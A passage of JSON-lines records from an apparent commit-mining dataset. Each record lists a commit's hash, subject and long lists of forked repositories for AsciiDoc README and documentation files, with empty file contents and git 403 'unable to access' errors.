arch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,s1monw\/elasticsearch,socialrank\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,xuzha\/elasticsearch,episerver\/elasticsearch,davidvgalbraith\/elasticsearch,kaneshin\/elasticsearch,tebriel\/elasticsearch,schonfeld\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,wbowling\/elasticsearch,ESamir\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,nomoa\/elasticsearch,cwurm\/elasticsearch,naveenhooda2000\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,nomoa\/elasticsearch,jeteve\/elasticsearch,dpursehouse\/elasticsearch,drewr\/elasticsearch,ESamir\/elasticsearch,mohit\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,dongjoon-hyun\/elasticsearch,myelin\/elasticsearch,andrejserafim\/elasticsearch,F0lha\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,camilojd\/elasticsearch,strapdata\/elassandra5-rc,ivansun1010\/elasticsearch,wuranbo\/elasticsearch,polyfractal\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,zkidkid\/elasticsearch,trangvh\
/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,kaneshin\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrejserafim\/elasticsearch,andrejserafim\/elasticsearch,ZTE-PaaS\/elasticsearch,AndreKR\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,socialrank\/elasticsearch,mikemccand\/elasticsearch,schonfeld\/elasticsearch,mikemccand\/elasticsearch,socialrank\/elasticsearch,nezirus\/elasticsearch,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,mapr\/elasticsearch,Shepard1212\/elasticsearch,mapr\/elasticsearch,jimczi\/elasticsearch,dpursehouse\/elasticsearch,AndreKR\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,iacdingping\/elasticsearch,glefloch\/elasticsearch,avikurapati\/elasticsearch,wbowling\/elasticsearch,LewayneNaidoo\/elasticsearch,kaneshin\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,rhoml\/elasticsearch,mohit\/elasticsearch,infusionsoft\/elasticsearch,schonfeld\/elasticsearch,dongjoon-hyun\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,rmuir\/elasticsearch,martinstuga\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,obourgain\/elasticsearch,snikch\/elasticsearch,jprante\/elasticsearch,socialrank\/elasticsearch,shreejay\/elasticsearch,jpountz\/elasticsearch,awislowski\/elasticsearch,jpountz\/elasticsearch,brandonkearby\/elasticsearch,kalimatas\/elasticsearch,zkidkid\/elasticsearch,jeteve\/elasticsearch,yynil\/elasticsearch,jeteve\/elasticsearch,drewr\/elasticsearch,camilojd\/elasticsearch,socialrank\/elasticsearch,polyfractal\/elasticsearch,gfyoung\/elasticsearch,jeteve\/elasticsearch,maddin2016\/elasticsearch,rmuir\/elasticsearch,obourgain\/elasticsearch,ivansun1010\/elasticsearch,rlugojr\/elasticsearch,clintongormley\/elasticsearch,girirajsharma\/elasticsearch,Collaborne\/elasticsearch,markharwood\/elasticsearch,socialrank\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,yanjunh\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,markharwood\/elasticsearch,avikurapati\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,JackyMai\/elasticsearch,infusionsoft\/elasticsearch,MaineC\/elasticsearch,robin13\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,rhoml\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,tebriel\/elasticsearch,episerver\/elasticsearch,jprante\/elasticsearch,masaruh\/elasticsearch,yynil\/elasticsearch,diendt\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,strapdata\/elassandra,myelin\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bde813385ba504daf47087289efa63d69cea06df","subject":"to DOM","message":"to DOM\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12c8cdb6f2c28206dcaa3614caa99712d5fcfa88","subject":"Create README.adoc","message":"Create README.adoc","repos":"jessbringlarsen\/jessbringlarsen.github.io,jessbringlarsen\/jessbringlarsen.github.io,jessbringlarsen\/jessbringlarsen.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jessbringlarsen\/jessbringlarsen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e29d22d1465d68124f86661ef0e441f8bf042a","subject":"Added codacy badge","message":"Added codacy badge","repos":"drmaas\/resilience4j,mehtabsinghmann\/resilience4j,goldobin\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"053f9c8ce4a75ab5778a22009f0c42d786a1d8d0","subject":"Updated documentation","message":"Updated documentation\n","repos":"storozhukBM\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bd23b4cd65047c0d6be73e39f43b9372cd473cd","subject":"added README","message":"added README\n","repos":"abelsromero\/pdf-box-examples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abelsromero\/pdf-box-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d18e6d2ec81409b610f06861719afb01af55c3c","subject":"docs: Fix broken links","message":"docs: Fix broken links\n\n\r\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ff2300c2bc85f176e9117d70363dff215bc7f21","subject":"initial import","message":"initial 
import\n","repos":"Mogztter\/asciidoctor.js,Mogztter\/asciidoctor.js,rahmanusta\/asciidoctor.js,nawroth\/asciidoctor.js,anthonny\/asciidoctor.js,Mogztter\/asciidoctor.js,asciidocfx\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidoctor\/asciidoctor.js,anthonny\/asciidoctor.js,mojavelinux\/asciidoctor.js,nawroth\/asciidoctor.js,anthonny\/asciidoctor.js,Mogztter\/asciidoctor.js,asciidocfx\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidocfx\/asciidoctor.js,rahmanusta\/asciidoctor.js,rahmanusta\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidoctor\/asciidoctor.js,asciidoctor\/asciidoctor.js,mojavelinux\/asciidoctor.js,asciidocfx\/asciidoctor.js,Mogztter\/asciidoctor.js,anthonny\/asciidoctor.js,rahmanusta\/asciidoctor.js,Mogztter\/asciidoctor.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d380e4d7793b04da02ff3a3e0c3bebfd550682d4","subject":"Add @jaredmorgs modification, add informations about cover-image, tags and publication date","message":"Add @jaredmorgs modification, add informations about cover-image, tags and publication date\n","repos":"ice09\/ice09ng,fbridault\/sandblog,dan-blanchard\/blog,alexhanschke\/hubpress.io,semarium\/blog,josegomezr\/blog,jamarortiz\/pragmaticalware,agentmilindu\/hubpress.io,julianrichen\/blog,DavidTPate\/davidtpate.com,anandjagadeesh\/blog,brieb\/hubpress.io,mcrotty\/hubpress.io,jjmean2\/server-study,sharmivssharmi\/sharmipress,lauesa\/Blog,chackomathew\/blog,Abdul2\/abdul2.github.io,ciena-blueplanet\/developers.blog,dmacstack\/glob,gscheibel\/blog,sanctumware\/hubpress,rynop\/rynop.hubpress.io,devananda\/devananda.github.io,manelvf\/blog,pdudits\/hubpress,pepite\/hubpress.io,simonturesson\/hubpresstestsimon,OlympusOnline2\/announcements,melix\/hubpress,rrrhys\/blog.codeworkshop.com.au,Port666\/hubpress.io,schweitzer\/hubpress.io,seturne\/hubpress.io,MinxianLi\/hubpress.io,JohanBrunet\/hubpress.io,crobby\/hubpress.io,mgreau\/posts,J0HDev\/blog,ruaqiwei23\/blog,pascalgrimaud\/hubpress.io,entropyz\/blog,celsogg\/blog,isaacriquelme\/endata.do,ottoandry\/ottoandry1,AirHacX\/blog.airhacx.com,btsibr\/myhubpress,DimShadoWWW\/blog,kornel661\/blog-test-jm,christofmarti\/blog,lauesa\/Blog,crobby\/hubpress.io,flug\/flug.github.io,Abdul2\/abdul2.github.io,marksubbarao\/hubpress.io,artavels\/pages,gbougeard\/blog.english,dsuryakusuma\/dsuryakusuma.github.io,jiashengc\/blog,fghhfg\/hubpress.io,demiansan\/demiansan.github.io,arabindamoni\/hubpress.io,envyen\/blog,hutchr\/hutchr.github.io,itsmyr4bbit\/blog,yhikishima\/hubpress,adest\/press,amberry\/blog,codetricity\/journey,christofmarti\/blog,woehrl01\/woehrl01.hubpress.io,elinep\/blog,cmhgroupllc\/blog,joshuarrrr\/hubpress.io,errorval\/blog,simpleHoChun\/blog,tedbergeron\/hubpress.io,celsogg\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,bemug\/devblog,mairandomness\/randomblog,qingyuqy\/qingyuqy.io,gsha0\/hubpress.io,jiashengc\/blog,gogonkt\/makenothing,jpcanovas\/myBlog,Nepal-Blockchain\/danphe-blogs,moonPress\/press.io,vuthaihoc\/vuthaihoc.github.io,thesagarsutar\/hubpress,henryouly\/henryouly.github.io,discimport\/blog.discimport.dk,princeminz\/blog,palaxi00\/palaxi00.github.io,lrabiet\/patisserie,rorosaurus\/hubpress.io,pej\/hubpress.io,ucide-coruptia\/ucide-coruptia.ro,cmhgroupllc\/blog,discimport\/blog.discimport.dk,jlmcgehee21\/nooganeer,dan-blanchard\/blog,elinep\/blog,jimm
idyson\/testblog,Perthmastersswimming\/hubpress.io,juhuntenburg\/gsoc2017,bemug\/devblog,fghhfg\/hubpress.io,joshuarrrr\/hubpress.io,qingyuqy\/qingyuqy.io,mkent-at-rivermeadow-dot-com\/hubpress.io,andreassiegelrfid\/hubpress.io,Red5\/red5.github.io,wzzrd\/hubpress.io,fwalloe\/infosecbriefly,philippevidal80\/blog,roelvs\/hubpress.io,jamarortiz\/pragmaticalware,setupminimal\/blog,hinaloe\/hubpress,topicusonderwijs\/topicusonderwijs.github.io,ice09\/ice09ng,abesn\/hubpress.io,Perthmastersswimming\/hubpress.io,aql\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,plyom\/hubpress.io,jjmean2\/server-study,rh0\/the-myriad-path,sebprev\/blog,hutchr\/hutchr.github.io,Codearte\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,artavels\/pages,palaxi00\/palaxi00.github.io,Jekin6\/blog,pdudits\/hubpress,jiashengc\/blog,julianrichen\/blog,jjmean2\/server-study,nicolaschaillot\/pechdencouty,iKnowMagic\/hubpress.io,blackGirlsCode\/blog,SnorlaxH\/blog.urusa.me,cmolitor\/blog,jmnarloch\/blog.io,topluluk\/blog,ashalkhakov\/hubpress.io,yhikishima\/hubpress,crotel\/studio,koter84\/blog,kornel661\/blog-test-jm,alexhanschke\/hubpress.io,gbougeard\/blog.english,Cribstone\/humblehacker,benignbala\/hubpress.io,mkc188\/hubpress.io,xinmeng1\/note,nthline\/hubpress.io,SockPastaRock\/hubpress.io,willcrisis\/www.willcrisis.com,julianrichen\/blog,igovsol\/blog,willcrisis\/www.willcrisis.com,Port666\/hubpress.io,jimmidyson\/testblog,SockPastaRock\/hubpress.io,kobusb\/blog,benignbala\/benignbala.hubpress.io,imukulsharma\/imukulsharma.github.io,mcornell\/OFM,flug\/flug.github.io,lauesa\/Blog,anwfr\/blog.anw.fr,paolo215\/blog,ncomet\/asciiblog,RussellSnyder\/hubpress-test,magivfer\/pages,AlexL777\/hubpressblog,J0HDev\/blog,jamarortiz\/pragmaticalware,Adyrhan\/adyrhan.github.io,manelvf\/blog,mgreau\/posts,roelvs\/hubpress.io,xinmeng1\/note,topicusonderwijs\/topicusonderwijs.github.io,leomedia\/blog,wzzrd\/hubpress.io,jlmcgehee21\/nooganeer,booleanbalaji\/hubpress.io,gilangdanu\/blog,crotel\/meditation,timofei7\/onroutenow,timofei7\/onroutenow,filipeuva\/filipeuva.blog,benignbala\/hubpress.io,gilangdanu\/blog,hang-h\/hubpress.io,ambarishpande\/blog,fwalloe\/infosecbriefly,danen-carlson\/blog,henryouly\/henryouly.github.io,adjiebpratama\/press,codelab-lbernard\/blog,benignbala\/benignbala.hubpress.io,victorcouste\/blog,fastretailing\/blog,freekrai\/hubpress,tom-konda\/blog,brendena\/hubpress.io,nicksam112\/nicksam112.github.io,ErJ101\/hbspractise,lichengzhu\/blog,sidorares\/sidorares.github.io,hva314\/blog,seturne\/hubpress.io,aspick\/hubpress.io,xinmeng1\/note,brieb\/hubpress.io,jmnarloch\/blog.io,DaOesten\/hubpress.io,BenBals\/hubpress,hinaloe\/hubpress,alexknowshtml\/thebigmove,devananda\/devananda.github.io,yaks-all-the-way-down\/hubpress.github.io,cmolitor\/blog,nicolaschaillot\/pechdencouty,rubyinhell\/hubpress.io,andreassiegelrfid\/hubpress.io,ucide-coruptia\/ucide-coruptia.ro,sharmivssharmi\/sharmipress,cmolitor\/blog,mufarooqq\/blog,christofmarti\/blog,alexhanschke\/hubpress.io,dawn-chiniquy\/clear-project.org,nicksam112\/nicksam112.github.io,ReadyP1\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,gogonkt\/makenothing,lawrencetaylor\/hubpress.io,amberry\/blog,gilangdanu\/blog,envyen\/blog,fwalloe\/infosecbriefly,ashalkhakov\/hubpress.io,ErJ101\/hbspractise,discimport\/blog.discimport.dk,gsha0\/hubpress.io,xinmeng1\/note,loetjoe\/blog,rh0\/the-myriad-path,OlympusOnline2\/announcements,mimiz\/mimiz.github.io,atomfrede\/shiny-adventure,liyucun\/blog,joescharf\/joescharf.github.io,thaibeouu\/blog,jerometambo\/blog,matthardwic
k\/hubpress.io,miroque\/shirokuma,crotel\/studio,ruaqiwei23\/blog,wzzrd\/hubpress.io,OdieD8\/hubpress.io,Jekin6\/blog,celsogg\/blog,puff-tw\/hubpress.io,alexknowshtml\/thebigmove,jsiu22\/blog,duggiemitchell\/JavascriptMuse,trangunghoa\/hubpress.io,lawrencetaylor\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,binout\/javaonemorething,manelvf\/blog,gscheibel\/blog,mairandomness\/randomblog,pdudits\/pdudits.github.io,brendena\/hubpress.io,rorohiko21\/blog,ambarishpande\/blog,jcsirot\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,MinxianLi\/hubpress.io,kobusb\/blog,lichengzhu\/blog,diodario\/hubpress.io,mcornell\/OFM,btsibr\/myhubpress,jlcurty\/jlcurty.github.io-,akhmetgali\/hubpress.io,danen-carlson\/blog,sebprev\/blog,mikqi\/blog,DavidTPate\/davidtpate.com,Sth0nian\/hubpress.io,aspick\/hubpress.io,hiun\/hubpress.io,ncomet\/asciiblog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,kobusb\/blog,shinnoki\/hubpress.io,jlcurty\/jlcurty.github.io-,PerthHackers\/blog,mufarooqq\/blog,sebarid\/pages,JacobSamro\/blog,Evolution2626\/blog,erramuzpe\/gsoc2016,metadevfoundation\/metadevfoundation.github.io,filipeuva\/filipeuva.blog,seturne\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,miroque\/shirokuma,kornel661\/blog-test-jm,rorohiko21\/blog,JacobSamro\/blog,ciena-blueplanet\/developers.blog,devananda\/devananda.github.io,Jason2013\/hubpress,victorcouste\/blog,pramodjg\/articles,sakkemo\/blog,MirumSG\/agencyshowcase,pramodjg\/articles,isaacriquelme\/endata.do,aql\/hubpress.io,hiun\/hubpress.io,AnassKartit\/anasskartit.github.io,willcrisis\/www.willcrisis.com,whelamc\/life,nandansaha\/AroundTheWeb,baocongchen\/blogs,ashalkhakov\/hubpress.io,e-scape\/blog,palaxi00\/palaxi00.github.io,apoch\/blog,ludolphus\/hubpress.io,RussellSnyder\/hubpress-test,Red5\/red5.github.io,arabindamoni\/hubpress.io,OdieD8\/hubpress.io,TeksInHelsinki\/en,koter84\/blog,alexknowshtml\/thebigmove,qingyuqy\/qingyuqy.io,loetjoe\/blog,Codearte\/hubpress.io,abesn\/hubpress.io,Perthmastersswimming\/hubpress.io,fw4spl-org\/fw4spl-blog,shunkou\/blog,shinnoki\/hubpress.io,pepite\/hubpress.io,eimajenthat\/hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,jamarortiz\/pragmaticalware,mrfgl\/blog,artavels\/pages,bemug\/devblog,dmacstack\/glob,brendena\/hubpress.io,sakkemo\/blog,semarium\/blog,Jekin6\/blog,setupminimal\/blog,Nepal-Blockchain\/danphe-blogs,ucide-coruptia\/ucide-coruptia.ro,entropyz\/blog,Cribstone\/humblehacker,lrabiet\/patisserie,sanctumware\/hubpress,sebarid\/pages,abesn\/hubpress.io,mcrotty\/hubpress.io,pej\/hubpress.io,laibaogo\/hubpress.io,josegomezr\/blog,rubyinhell\/hubpress.io,SnorlaxH\/blog.urusa.me,Lukas238\/the-holodeck,berryzed\/tech-blog,eimajenthat\/hubpress.io,mrfgl\/blog,setupminimal\/blog,ReadyP1\/hubpress.io,ml4den\/hubpress,iKnowMagic\/hubpress.io,jabbytechnologies\/blog,pramodjg\/articles,envyen\/blog,rrrhys\/blog.codeworkshop.com.au,TeksInHelsinki\/en,thesagarsutar\/hubpress,jerometambo\/blog,rynop\/rynop.hubpress.io,tmdgus0118\/blog.code404.co.kr,jerometambo\/blog,baocongchen\/blogs,simonturesson\/hubpresstestsimon,errorval\/blog,simpleHoChun\/blog,Nepal-Blockchain\/danphe-blogs,pdudits\/pdudits.github.io,matthardwick\/hubpress.io,sidorares\/sidorares.github.io,liyucun\/blog,erramuzpe\/gsoc2016,entropyz\/blog,woehrl01\/woehrl01.hubpress.io,freekrai\/hubpress,SwarnaKishore\/blog,danen-carlson\/blog,filipeuva\/filipeuva.blog,OlympusOnline2\/announcements,joescharf\/joescharf.github.io,heartnn\/hubpress.io,paolo215\/blog,JohanBrunet\/hubpress.io,kobusb\/blog,jpcanovas\/myBlog,binout\/javaonemo
rething,puff-tw\/hubpress.io,tmdgus0118\/blog.code404.co.kr,joshuarrrr\/hubpress.io,lichengzhu\/blog,Bloggerschmidt\/bloggerschmidt.de,jabbytechnologies\/blog,atomfrede\/shiny-adventure,IEEECompute\/blog,rrrhys\/blog.codeworkshop.com.au,ambarishpande\/blog,DaOesten\/hubpress.io,henryouly\/henryouly.github.io,mkc188\/hubpress.io,apoch\/blog,mcrotty\/hubpress.io,AnassKartit\/anasskartit.github.io,nicolaschaillot\/pechdencouty,leomedia\/blog,errorval\/blog,Evolution2626\/blog,metadevfoundation\/metadevfoundation.github.io,ruaqiwei23\/blog,hanwencheng\/Undepth,iKnowMagic\/hubpress.io,mimiz\/mimiz.github.io,jbutz\/hubpress-test,mimiz\/mimiz.github.io,Adyrhan\/adyrhan.github.io,seturne\/hubpress.io,aql\/hubpress.io,timofei7\/onroutenow,melix\/hubpress,rjhbrunt\/hubpress.io,rjhbrunt\/hubpress.io,jcsirot\/hubpress.io,MirumSG\/agencyshowcase,ErJ101\/hbspractise,fwalloe\/infosecbriefly,dsuryakusuma\/dsuryakusuma.github.io,semarium\/blog,ReadyP1\/hubpress.io,benignbala\/hubpress.io,sebarid\/pages,nandansaha\/AroundTheWeb,erramuzpe\/gsoc2016,lrabiet\/patisserie,jerometambo\/blog,thesagarsutar\/hubpress,arseniuss\/blog.arseniuss.id.lv,entropyz\/blog,porolakka\/hubpress.io,jmini\/hubpress.io,pramodjg\/articles,rynop\/rynop.hubpress.io,ottoandry\/ottoandry1,codelab-lbernard\/blog,jlcurty\/jlcurty.github.io-,Kyrzo\/kyrzo.github.io,fastretailing\/blog,wzzrd\/hubpress.io,PerthHackers\/blog,trangunghoa\/hubpress.io,apoch\/blog,jcsirot\/hubpress.io,Astrokoala-Studio\/hubpress.io,agentmilindu\/hubpress.io,joescharf\/joescharf.github.io,igovsol\/blog,Evolution2626\/blog,Kyrzo\/kyrzo.github.io,abhayghatpande\/hubpress.io,mrtrombley\/blog,AlexL777\/hubpressblog,miroque\/shirokuma,IEEECompute\/blog,dawn-chiniquy\/clear-project.org,jsiu22\/blog,Port666\/hubpress.io,ciena-blueplanet\/developers.blog,AlexL777\/hubpressblog,fbridault\/sandblog,jfavlam\/Concepts,Lukas238\/the-holodeck,mathieu-pousse\/hubpress.io,jmnarloch\/blog.io,msavy\/rhymewithgravy.com,abhayghatpande\/hubpress.io,anandjagadeesh\/blog,pej\/hubpress.io,ruaqiwei23\/blog,anshu92\/blog,DimShadoWWW\/blog,magivfer\/pages,agentmilindu\/hubpress.io,JacobSamro\/blog,andreassiegelrfid\/hubpress.io,christofmarti\/blog,joshuarrrr\/hubpress.io,ditirambo\/ditirambo.es,redrabbit-calligraphy\/redrabbit-calligraphy-blog,Sth0nian\/hubpress.io,Jason2013\/hubpress,jabbytechnologies\/blog,mrfgl\/blog,hva314\/blog,IEEECompute\/blog,abhayghatpande\/hubpress.io,fbridault\/sandblog,ben-liu\/hubpress.io,yangsheng1107\/hubpress.io,eimajenthat\/hubpress.io,clear-project\/blog,ditirambo\/ditirambo.es,hutchr\/hutchr.github.io,crotel\/studio,adamperer\/diary,kim0\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,topicusonderwijs\/topicusonderwijs.github.io,sxgc\/blog,eimajenthat\/hubpress.io,trycrmr\/hubpress.io,rubyinhell\/hubpress.io,koter84\/blog,moonPress\/press.io,crotel\/meditation,lauesa\/Blog,atomfrede\/shiny-adventure,blackGirlsCode\/blog,Codearte\/hubpress.io,magivfer\/pages,juhuntenburg\/gsoc2017,igovsol\/blog,AirHacX\/blog.airhacx.com,MirumSG\/agencyshowcase,YvonneZhang\/yvonnezhang.github.io,hanwencheng\/hanwenblog,sharmivssharmi\/sharmipress,btsibr\/myhubpress,simonturesson\/hubpresstestsimon,topluluk\/blog,tedbergeron\/hubpress.io,mgreau\/posts,IEEECompute\/blog,kim0\/hubpress.io,erramuzpe\/gsoc2016,sakkemo\/blog,paolo215\/blog,woehrl01\/woehrl01.hubpress.io,ottoandry\/ottoandry1,JohanBrunet\/hubpress.io,moonPress\/press.io,setupminimal\/blog,rorohiko21\/blog,yangsheng1107\/hubpress.io,crotel\/meditation,kim0\/hubpress.io,liyucun\/blog,codetricity\/journey,p
dudits\/pdudits.github.io,Astrokoala-Studio\/hubpress.io,csiebler\/hubpress-test,lrabiet\/patisserie,fw4spl-org\/fw4spl-blog,natsu90\/hubpress.io,tmdgus0118\/blog.code404.co.kr,palaxi00\/palaxi00.github.io,binout\/javaonemorething,arabindamoni\/hubpress.io,hanwencheng\/hanwenblog,thesagarsutar\/hubpress,MinxianLi\/hubpress.io,binout\/javaonemorething,ssundarraj\/hubpress.io,adamperer\/diary,sakkemo\/blog,crobby\/hubpress.io,pepite\/hubpress.io,benignbala\/benignbala.hubpress.io,mikqi\/blog,dmacstack\/glob,sxgc\/blog,berryzed\/tech-blog,ashalkhakov\/hubpress.io,jfavlam\/Concepts,RaoUmer\/hubpress.io,cmhgroupllc\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,rorosaurus\/hubpress.io,mrtrombley\/blog,cherurg\/hubpress.io,natsu90\/hubpress.io,gscheibel\/blog,arseniuss\/blog.arseniuss.id.lv,tom-konda\/blog,abesn\/hubpress.io,201507\/blog,tehbilly\/blog,yaks-all-the-way-down\/hubpress.github.io,diodario\/hubpress.io,yelangya3826850\/monaenhubpress,philippevidal80\/blog,adamperer\/diary,anwfr\/blog.anw.fr,pascalgrimaud\/hubpress.io,chackomathew\/blog,juhuntenburg\/gsoc2017,matthardwick\/hubpress.io,anthonny\/personal-blog,mathieu-pousse\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,nicksam112\/nicksam112.github.io,Adyrhan\/adyrhan.github.io,jmini\/hubpress.io,RussellSnyder\/hubpress-test,ice09\/ice09ng,Bloggerschmidt\/bloggerschmidt.de,trycrmr\/hubpress.io,gbougeard\/blog.english,lawrencetaylor\/hubpress.io,rynop\/rynop.hubpress.io,ambarishpande\/blog,ml4den\/hubpress,gogonkt\/makenothing,ssundarraj\/hubpress.io,cmhgroupllc\/blog,philippevidal80\/blog,kornel661\/blog-test-jm,mufarooqq\/blog,itsmyr4bbit\/blog,trangunghoa\/hubpress.io,anwfr\/blog.anw.fr,apoch\/blog,jimmidyson\/testblog,DimShadoWWW\/blog,btsibr\/myhubpress,simonturesson\/hubpresstestsimon,lawrencetaylor\/hubpress.io,flug\/flug.github.io,marksubbarao\/hubpress.io,anwfr\/blog.anw.fr,imukulsharma\/imukulsharma.github.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,demiansan\/demiansan.github.io,tehbilly\/blog,jfavlam\/Concepts,jlmcgehee21\/nooganeer,Sth0nian\/hubpress.io,moonPress\/press.io,lichengzhu\/blog,HubPress\/demo.hubpress.io,sillyleo\/bible.notes,whelamc\/life,booleanbalaji\/hubpress.io,heartnn\/hubpress.io,hiun\/hubpress.io,chackomathew\/blog,berryzed\/tech-blog,anshu92\/blog,201507\/blog,willcrisis\/www.willcrisis.com,vuthaihoc\/vuthaihoc.github.io,fghhfg\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,agentmilindu\/hubpress.io,RaoUmer\/hubpress.io,ncomet\/asciiblog,mrtrombley\/blog,AnassKartit\/anasskartit.github.io,Lukas238\/the-holodeck,pascalgrimaud\/hubpress.io,rh0\/the-myriad-path,Astrokoala-Studio\/hubpress.io,yangsheng1107\/hubpress.io,tedbergeron\/hubpress.io,imukulsharma\/imukulsharma.github.io,julianrichen\/blog,OlympusOnline2\/announcements,rorosaurus\/hubpress.io,anthonny\/personal-blog,e-scape\/blog,msavy\/rhymewithgravy.com,Cribstone\/humblehacker,plyom\/hubpress.io,sebarid\/pages,cmolitor\/blog,Adyrhan\/adyrhan.github.io,sanctumware\/hubpress,pdudits\/pdudits.github.io,ncomet\/asciiblog,msavy\/rhymewithgravy.com,trycrmr\/hubpress.io,sebprev\/blog,yaks-all-the-way-down\/hubpress.github.io,shinnoki\/hubpress.io,BenBals\/hubpress,hiun\/hubpress.io,adest\/press,ErJ101\/hbspractise,diodario\/hubpress.io,elinep\/blog,nicksam112\/nicksam112.github.io,arseniuss\/blog.arseniuss.id.lv,adjiebpratama\/press,adjiebpratama\/press,loetjoe\/blog,devananda\/devananda.github.io,josegomezr\/blog,nicolaschaillot\/pechdencouty,gogonkt\/makenothing,andreassiegelrfid\/hubpress.io,hva314\/blog,hutchr\/hutchr.gith
